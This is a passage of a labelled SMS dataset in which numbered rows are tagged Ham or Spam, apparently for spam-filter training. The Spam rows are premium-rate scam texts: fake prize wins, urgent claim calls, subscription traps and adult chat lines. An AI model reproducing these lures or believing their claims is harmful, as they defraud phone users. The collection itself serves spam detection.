349 | Spam URGENT! Your mobile No *********** WON a £2,000 Bonus Caller Prize on 02/06/03! This is the 2nd attempt to reach YOU! Call 09066362220 ASAP! BOX97N7QP, 150ppm
350 | Ham U wan 2 haf lunch i'm in da canteen now.
351 | Ham I cant wait for cornwall. Hope tonight isnt too bad as well but its rock night shite. Anyway im going for a kip now have a good night. Speak to you soon.
352 | Spam PRIVATE! Your 2003 Account Statement for 07808247860 shows 800 un-redeemed S. I. M. points. Call 08719899229 Identifier Code: 40411 Expires 06/11/04
353 | Spam New Tones This week include: 1)McFly-All Ab.., 2) Sara Jorge-Shock.. 3) Will Smith-Switch.. To order follow instructions on next message
354 | Spam You are being ripped off! Get your mobile content from www.clubmoby.com call 08717509990 poly/true/Pix/Ringtones/Games six downloads for only 3
355 | Spam This weeks SavaMob member offers are now accessible. Just call 08709501522 for details! SavaMob, POBOX 139, LA3 2WU. Only £1.50/week. SavaMob - offers mobile!
356 | Ham Daddy, shu shu is looking 4 u... U wan me 2 tell him u're not in singapore or wat?
357 | Ham No..few hours before.went to hair cut .
358 | Ham Yes baby! We can study all the positions of the kama sutra ;)
359 | Ham Rose needs water, season needs change, poet needs imagination..My phone needs ur sms and i need ur lovely frndship forever....
360 | Spam 18 days to Euro2004 kickoff! U will be kept informed of all the latest news and results daily. Unsubscribe send GET EURO STOP to 83222.
361 | Ham I think just yourself …Thanks and see you tomo
362 | Spam SIX chances to win CASH! From 100 to 20,000 pounds txt> CSH11 and send to 87575. Cost 150p/day, 6days, 16+ TsandCs apply Reply HL 4 info
363 | Ham All these nice new shirts and the only thing I can wear them to is nudist themed ;_; you in mu?
364 | Ham X2 <#> . Are you going to get that
365 | Ham HI HUN! IM NOT COMIN 2NITE-TELL EVERY1 IM SORRY 4 ME, HOPE U AVA GOODTIME!OLI RANG MELNITE IFINK IT MITE B SORTED,BUT IL EXPLAIN EVERYTHIN ON MON.L8RS.x
366 | Ham Wat makes some people dearer is not just de happiness dat u feel when u meet them but de pain u feel when u miss dem!!!
367 | Spam England v Macedonia - dont miss the goals/team news. Txt ur national team to 87077 eg ENGLAND to 87077 Try:WALES, SCOTLAND 4txt/ú1.20 POBOXox36504W45WQ 16+
368 | Ham Hello, my love! How goes that day ? I wish your well and fine babe and hope that you find some job prospects. I miss you, boytoy ... *a teasing kiss*
369 | Spam Hi 07734396839 IBH Customer Loyalty Offer: The NEW NOKIA6600 Mobile from ONLY £10 at TXTAUCTION!Txt word:START to No:81151 & get Yours Now!4T&
370 | Spam Had your mobile 10 mths? Update to the latest Camera/Video phones for FREE. KEEP UR SAME NUMBER, Get extra free mins/texts. Text YES for a call
371 | Ham U too...
372 | Spam BangBabes Ur order is on the way. U SHOULD receive a Service Msg 2 download UR content. If U do not, GoTo wap. bangb. tv on UR mobile internet/service menu
373 | Ham Thanx. Yup we coming back on sun. Finish dinner going back 2 hotel now. Time flies, we're tog 4 exactly a mth today. Hope we'll haf many more mths to come...
374 | Spam Great NEW Offer - DOUBLE Mins & DOUBLE Txt on best Orange tariffs AND get latest camera phones 4 FREE! Call MobileUpd8 free on 08000839402 NOW! or 2stoptxt T&Cs
375 | Ham "Painful words- ""I thought being Happy was the most toughest thing on Earth... But, the toughest is acting Happy with all unspoken pain inside.."""
376 | Spam Marvel Mobile Play the official Ultimate Spider-man game (£4.50) on ur mobile right now. Text SPIDER to 83338 for the game & we ll send u a FREE 8Ball wallpaper
377 | Ham The affidavit says <#> E Twiggs St, division g, courtroom <#> , <TIME> AM. I'll double check and text you again tomorrow
378 | Ham New Theory: Argument wins d SITUATION, but loses the PERSON. So dont argue with ur friends just.. . . . kick them & say, I'm always correct.!
379 | Ham K, my roommate also wants a dubsack and another friend may also want some so plan on bringing extra, I'll tell you when they know for sure
380 | Spam Had your mobile 11 months or more? U R entitled to Update to the latest colour mobiles with camera for Free! Call The Mobile Update Co FREE on 08002986030
381 | Spam thesmszone.com lets you send free anonymous and masked messages..im sending this message from there..do you see the potential for abuse???
382 | Ham Yar lor he wan 2 go c horse racing today mah, so eat earlier lor. I ate chicken rice. U?
383 | Ham Lol enjoy role playing much?
384 | Ham Pls speak to that customer machan.
385 | Spam TheMob> Check out our newest selection of content, Games, Tones, Gossip, babes and sport, Keep your mobile fit and funky text WAP to 82468
386 | Spam "SMS. ac sun0819 posts HELLO:""You seem cool, wanted to say hi. HI!!!"" Stop? Send STOP to 62468"
387 | Spam December only! Had your mobile 11mths+? You are entitled to update to the latest colour camera mobile for Free! Call The Mobile Update Co FREE on 08002986906
388 | Ham Faith makes things possible,Hope makes things work,Love makes things beautiful,May you have all three this Christmas!Merry Christmas!
389 | Ham Thank you. I like you as well...
390 | Ham I need... Coz i never go before
391 | Spam 500 New Mobiles from 2004, MUST GO! Txt: NOKIA to No: 89545 & collect yours today!From ONLY £1 www.4-tc.biz 2optout 087187262701.50gbp/mtmsg18 TXTAUCTION
392 | Ham Mm that time you dont like fun
393 | Spam 1000's flirting NOW! Txt GIRL or BLOKE & ur NAME & AGE, eg GIRL ZOE 18 to 8007 to join and get chatting!
394 | Ham Haha awesome, I've been to 4u a couple times. Who all's coming?
395 | Ham Just woke up. Yeesh its late. But I didn't fall asleep til <#> am :/
396 | Spam U have a secret admirer who is looking 2 make contact with U-find out who they R*reveal who thinks UR so special-call on 09058094565
397 | Ham Did he say how fantastic I am by any chance, or anything need a bigger life lift as losing the will 2 live, do you think I would be the first person 2 die from N V Q?
398 | Spam "FREE RING TONE just text ""POLYS"" to 87131. Then every week get a new tone. 0870737910216yrs only £1.50/wk."
399 | Ham Ok can...
400 | Spam Get ur 1st RINGTONE FREE NOW! Reply to this msg with TONE. Gr8 TOP 20 tones to your phone every week just £1.50 per wk 2 opt out send STOP 08452810071 16
401 | Spam Get a brand new mobile phone by being an agent of The Mob! Plus loads more goodies! For more info just text MAT to 87021.
402 | Ham I sent them. Do you like?
403 | Ham Good. do you think you could send me some pix? I would love to see your top and bottom...
404 | Ham I accidentally brought em home in the box
405 | Spam Camera - You are awarded a SiPix Digital Camera! call 09061221066 fromm landline. Delivery within 28 days.
406 | Ham S....s...india going to draw the series after many years in south african soil..
407 | Spam IMPORTANT MESSAGE. This is a final contact attempt. You have important messages waiting out our customer claims dept. Expires 13/4/04. Call 08717507382 NOW!
408 | Ham You'd like that wouldn't you? Jerk!
409 | Ham How long does it take to get it.
410 | Spam Our records indicate u maybe entitled to 5000 pounds in compensation for the Accident you had. To claim 4 free reply with CLAIM to this msg. 2 stop txt STOP
411 | Ham Oh:)as usual vijay film or its different?
412 | Ham Tmr then ü brin lar... Aiya later i come n c lar... Mayb ü neva set properly ü got da help sheet wif ü...
413 | Spam Loan for any purpose £500 - £75,000. Homeowners + Tenants welcome. Have you been previously refused? We can still help. Call Free 0800 1956669 or text back 'help'
414 | Ham So li hai... Me bored now da lecturer repeating last weeks stuff waste time...
415 | Spam cmon babe, make me horny, *turn* me on! Txt me your fantasy now babe -) Im hot, sticky and need you now. All replies cost £1.50. 2 cancel send STOP
416 | Spam Hope you enjoyed your new content. text stop to 61610 to unsubscribe. help:08712400602450p Provided by tones2you.co.uk
417 | Ham Oh great. I.ll disturb him more so that we can talk.
418 | Ham I have 2 sleeping bags, 1 blanket and paper and phone details. Anything else?
419 | Spam URGENT! You have won a 1 week FREE membership in our £100,000 Prize Jackpot! Txt the word: CLAIM to No: 81010 T&C www.dbuk.net LCCLTD POBOX 4403LDNW1A7RW18
420 | Ham Great! So what attracts you to the brothas?
421 | Ham My supervisor find 4 me one lor i thk his students. I havent ask her yet. Tell u aft i ask her.
422 | Spam FREE for 1st week! No1 Nokia tone 4 ur mob every week just txt NOKIA to 8007 Get txting and tell ur mates www.getzed.co.uk POBox 36504 W45WQ norm150p/tone 16+
423 | Ham O we cant see if we can join denis and mina? Or does denis want alone time
424 | Spam Can U get 2 phone NOW? I wanna chat 2 set up meet Call me NOW on 09096102316 U can cum here 2moro Luv JANE xx Calls£1/minmoremobsEMSPOBox45PO139WA
425 | Ham Jordan got voted out last nite!
426 | Ham Tomarrow i want to got to court. At <DECIMAL> . So you come to bus stand at 9.
427 | Ham I dont thnk its a wrong calling between us
428 | Spam Congratulations - Thanks to a good friend U have WON the £2,000 Xmas prize. 2 claim is easy, just call 08712103738 NOW! Only 10p per minute. BT-national-rate
429 | Ham I could ask carlos if we could get more if anybody else can chip in
430 | Ham You have to pls make a note of all she.s exposed to. Also find out from her school if anyone else was vomiting. Is there a dog or cat in the house? Let me know later.
431 | Spam important information 4 orange user 0789xxxxxxx. today is your lucky day!2find out why log onto http://www.urawinner.com THERE'S A FANTASTIC SURPRISE AWAITING YOU!
432 | Spam New TEXTBUDDY Chat 2 horny guys in ur area 4 just 25p Free 2 receive Search postcode or at gaytextbuddy.com. TXT ONE name to 89693
433 | Spam Guess what! Somebody you know secretly fancies you! Wanna find out who it is? Give us a call on 09065394514 From Landline DATEBox1282EssexCM61XN 150p/min 18
434 | Ham I'm home...
435 | Spam GSOH? Good with SPAM the ladies?U could b a male gigolo? 2 join the uk's fastest growing mens club reply ONCALL. mjzgroup. 08714342399.2stop reply STOP. msg@£1.50rcvd
436 | Spam Want to funk up ur fone with a weekly new tone reply TONES2U 2 this text. www.ringtones.co.uk, the original n best. Tones 3GBP network operator rates apply
437 | Spam URGENT! Last weekend's draw shows that you have won £1000 cash or a Spanish holiday! CALL NOW 09050000332 to claim. T&C: RSTM, SW7 3SS. 150ppm
438 | Ham My Parents, My Kidz, My Friends n My Colleagues. All screaming.. SURPRISE !! and I was waiting on the sofa.. ... ..... ' NAKED...!
439 | Spam You have WON a guaranteed £1000 cash or a £2000 prize. To claim yr prize call our customer service representative on 08714712412 between 10am-7pm Cost 10p
440 | Spam Had your mobile 11mths ? Update for FREE to Oranges latest colour camera mobiles & unlimited weekend calls. Call Mobile Upd8 on freefone 08000839402 or 2StopTx
441 | Spam Reply to win £100 weekly! Where will the 2006 FIFA World Cup be held? Send STOP to 87239 to end service
442 | Ham Ok i vl..do u know i got adsense approved..
443 | Spam 88800 and 89034 are premium phone services call 08718711108
444 | Spam Hi this is Amy, we will be sending you a free phone number in a couple of days, which will give you an access to all the adult parties...
445 | Ham How's my loverboy doing ? What does he do that keeps him from coming to his Queen, hmmm ? Doesn't he ache to speak to me ? Miss me desparately ?
446 | Spam Your credits have been topped up for http://www.bubbletext.com Your renewal Pin is tgxxrz
447 | Ham ALSO TELL HIM I SAID HAPPY BIRTHDAY
448 | Ham Cheers for the card ... Is it that time of year already?
449 | Spam Refused a loan? Secured or Unsecured? Can't get credit? Call free now 0800 195 6669 or text back 'help' & we will!
450 | Spam Last Chance! Claim ur £150 worth of discount vouchers today! Text SHOP to 85023 now! SavaMob, offers mobile! T Cs SavaMob POBOX84, M263UZ. £3.00 Sub. 16
451 | Ham Goodmorning today i am late for <DECIMAL> min.
452 | Ham For me the love should start with attraction.i should feel that I need her every time around me.she should be the first thing which comes in my thoughts.I would start the day and end it with her.she s
453 | Spam You've won tkts to the EURO2004 CUP FINAL or £800 CASH, to collect CALL 09058099801 b4190604, POBOX 7876150ppm
454 | Spam HMV BONUS SPECIAL 500 pounds of genuine HMV vouchers to be won. Just answer 4 easy questions. Play Now! Send HMV to 86688 More info:www.100percent-real.com
455 | Spam Natalja (25/F) is inviting you to be her friend. Reply YES-440 or NO-440 See her: www.SMS.ac/u/nat27081980 STOP? Send STOP FRND to 62468
456 | Spam This is the 2nd attempt to contract U, you have won this weeks top prize of either £1000 cash or £200 prize. Just call 09066361921
457 | Spam Free-message: Jamster!Get the crazy frog sound now! For poly text MAD1, for real text MAD2 to 88888. 6 crazy sounds for just 3 GBP/week! 16+only! T&C's apply
458 | Spam Congrats! 2 mobile 3G Videophones R yours. call 09061744553 now! videochat wid ur mates, play java games, Dload polyH music, noline rentl. bx420. ip4. 5we. 150pm
459 | Ham "Edison has rightly said, ""A fool can ask more questions than a wise man can answer"" Now you know why all of us are speechless during ViVa.. GM,GN,GE,GNT:-)"
460 | Ham This pen thing is beyond a joke. Wont a Biro do? Don't do a masters as can't do this ever again!
461 | Spam You are awarded a SiPix Digital Camera! call 09061221061 from landline. Delivery within 28days. T Cs Box177. M221BP. 2yr warranty. 150ppm. 16 . p p£3.99
462 | Ham Hey u still at the gym?
463 | Spam 44 7732584351, Do you want a New Nokia 3510i colour phone DeliveredTomorrow? With 300 free minutes to any mobile + 100 free texts + Free Camcorder reply or call 08000930705.
464 | Ham My friend, she's studying at warwick, we've planned to go shopping and to concert tmw, but it may be canceled, havn't seen for ages, yeah we should get together sometime!
465 | Ham BABE !!! I miiiiiiissssssssss you ! I need you !!! I crave you !!! :-( ... Geeee ... I'm so sad without you babe ... I love you ...
466 | Ham Aiyo... U always c our ex one... I dunno abt mei, she haven reply... First time u reply so fast... Y so lucky not workin huh, got bao by ur sugardad ah...gee..
467 | Spam FreeMsg: Claim ur 250 SMS messages-Text OK to 84025 now!Use web2mobile 2 ur mates etc. Join Txt250.com for 1.50p/wk. T&C BOX139, LA32WU. 16 . Remove txtX or stop
468 | Ham Joy's father is John. Then John is the ____ of Joy's father. If u ans ths you hav <#> IQ. Tis s IAS question try to answer.
469 | Ham I get out of class in bsn in like <#> minutes, you know where advising is?
470 | Spam accordingly. I repeat, just text the word ok on your mobile phone and send
471 | Spam CALL 09090900040 & LISTEN TO EXTREME DIRTY LIVE CHAT GOING ON IN THE OFFICE RIGHT NOW TOTAL PRIVACY NO ONE KNOWS YOUR [sic] LISTENING 60P MIN 24/7MP 0870753331018+
472 | Spam WIN a year supply of CDs 4 a store of ur choice worth £500 & enter our £100 Weekly draw txt MUSIC to 87066 Ts&Cs www.Ldew.com.subs16+1win150ppmx3
473 | Spam FreeMsg Hey there darling it's been 3 week's now and no word back! I'd like some fun you up for it still? Tb ok! XxX std chgs to send, £1.50 to rcv
474 | Spam Hard LIVE 121 chat just 60p/min. Choose your girl and connect LIVE. Call 09094646899 now! Cheap Chat UK's biggest live service. VU BCM1896WC1N3XX
475 | Spam Please call our customer service representative on 0800 169 6031 between 10am-9pm as you have WON a guaranteed £1000 cash or £5000 prize!
476 | Spam You won't believe it but it's true. It's Incredible Txts! Reply G now to learn truly amazing things that will blow your mind. From O2FWD only 18p/txt
477 | Spam Someonone you know is trying to contact you via our dating service! To find out who it could be call from your mobile or landline 09064015307 BOX334SK38ch
478 | Ham Hey... Thk we juz go accordin to wat we discussed yest lor, except no kb on sun... Cos there's nt much lesson to go if we attend kb on sat...
479 | Ham Aight, I'll text you when I'm back
480 | Spam Bored of speed dating? Try SPEEDCHAT, txt SPEEDCHAT to 80155, if you don't like em txt SWAP and get a new chatter! Chat80155 POBox36504W45WQ 150p/msg rcd 16
481 | Ham Or I guess <#> min
482 | Ham Awesome, I remember the last time we got somebody high for the first time with diesel :V
483 | Spam Ur cash-balance is currently 500 pounds - to maximize ur cash-in now send GO to 86688 only 150p/meg. CC: 08718720201 HG/Suite342/2lands Row/W1j6HL
484 | Ham Hi ....My engagement has been fixd on <#> th of next month. I know its really shocking bt....hmm njan vilikkam....t ws al of a sudn;-(.
485 | Ham What's up my own oga. Left my phone at home and just saw ur messages. Hope you are good. Have a great weekend.
486 | Ham Alright. I'm out--have a good night!
487 | Spam "For your chance to WIN a FREE Bluetooth Headset then simply reply back with ""ADP"""
488 | Spam Free 1st week entry 2 TEXTPOD 4 a chance 2 win 40GB iPod or £250 cash every wk. Txt POD to 84128 Ts&Cs www.textpod.net custcare 08712405020.
489 | Spam Todays Voda numbers ending with 7634 are selected to receive a £350 reward. If you have a match please call 08712300220 quoting claim code 7684 standard rates apply.
490 | Ham Just got to <#>
491 | Ham Oh...i asked for fun. Haha...take care. ü
492 | Spam "You can stop further club tones by replying ""STOP MIX"" See my-tone.com/enjoy. html for terms. Club tones cost GBP4.50/week. MFL, PO Box 1146 MK45 2WT (2/3)"
493 | Ham We have pizza if u want
494 | Ham Tee hee. Off to lecture, cheery bye bye.
495 | Spam We tried to contact you re our offer of New Video Phone 750 anytime any network mins HALF PRICE Rental camcorder call 08000930705 or reply for delivery Wed
496 | Spam Someone has contacted our dating service and entered your phone because they fancy you! To find out who it is call from a landline 09111032124 . PoBox12n146tf150p
497 | Ham Good afternoon, my love. It was good to see your words on YM and get your tm. Very smart move, my slave ... *smiles* ... I drink my coffee and await you.
498 | Spam SMS AUCTION You have won a Nokia 7250i. This is what you get when you win our FREE auction. To take part send Nokia to 86021 now. HG/Suite342/2Lands Row/W1JHL 16+
499 | Spam 2p per min to call Germany 08448350055 from your BT line. Just 2p per min. Check PlanetTalkInstant.com for info & T's & C's. Text stop to opt out
500 | Ham Yup. Izzit still raining heavily cos i'm in e mrt i can't c outside.
501 | Ham Are you this much buzy
502 | Spam UR GOING 2 BAHAMAS! CallFREEFONE 08081560665 and speak to a live operator to claim either Bahamas cruise of£2000 CASH 18+only. To opt out txt X to 07786200117
503 | Spam it to 80488. Your 500 free text messages are valid until 31 December 2005.
504 | Ham Goodmorning, today i am late for <DECIMAL> min.
505 | Ham Pls send me a comprehensive mail about who i'm paying, when and how much.
506 | Ham Heart is empty without love.. Mind is empty without wisdom.. Eyes r empty without dreams & Life is empty without frnds.. So Alwys Be In Touch. Good night & sweet dreams
507 | Spam U are subscribed to the best Mobile Content Service in the UK for £3 per ten days until you send STOP to 83435. Helpline 08706091795.
508 | Spam Congratulations U can claim 2 VIP row A Tickets 2 C Blu in concert in November or Blu gift guaranteed Call 09061104276 to claim TS&Cs www.smsco.net cost£3.75max
509 | Ham I had a good time too. Its nice to do something a bit different with my weekends for a change. See ya soon
510 | Spam 18 days to Euro2004 kickoff! U will be kept informed of all the latest news and results daily. Unsubscribe send GET EURO STOP to 83222.
511 | Ham I wnt to buy a BMW car urgently..its vry urgent.but hv a shortage of <#> Lacs.there is no source to arng dis amt. <#> lacs..thats my prob
512 | Spam You have won a Nokia 7250i. This is what you get when you win our FREE auction. To take part send Nokia to 86021 now. HG/Suite342/2Lands Row/W1JHL 16+
513 | Spam Promotion Number: 8714714 - UR awarded a City Break and could WIN a £200 Summer Shopping spree every WK. Txt STORE to 88039 . SkilGme. TsCs087147403231Winawk!Age16 £1.50perWKsub
514 |
--------------------------------------------------------------------------------